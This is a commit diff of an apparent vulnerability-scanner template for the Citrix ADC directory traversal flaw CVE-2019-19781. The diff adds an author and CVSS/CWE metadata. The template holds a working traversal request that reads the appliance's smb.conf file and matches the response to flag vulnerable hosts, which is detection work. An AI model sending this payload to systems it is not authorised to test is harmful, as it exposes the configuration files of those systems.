commit
444640832b
|
@ -2,22 +2,28 @@ id: CVE-2019-19781
|
|||
|
||||
info:
|
||||
name: Citrix ADC Directory Traversal
|
||||
author: organiccrap
|
||||
author: organiccrap,geeknik
|
||||
severity: critical
|
||||
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
|
||||
reference: https://support.citrix.com/article/CTX267027
|
||||
tags: cve,cve2019,citrix,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2019-19781
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,citrix,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "[global]"
|
||||
|
|
Loading…
Reference in New Issue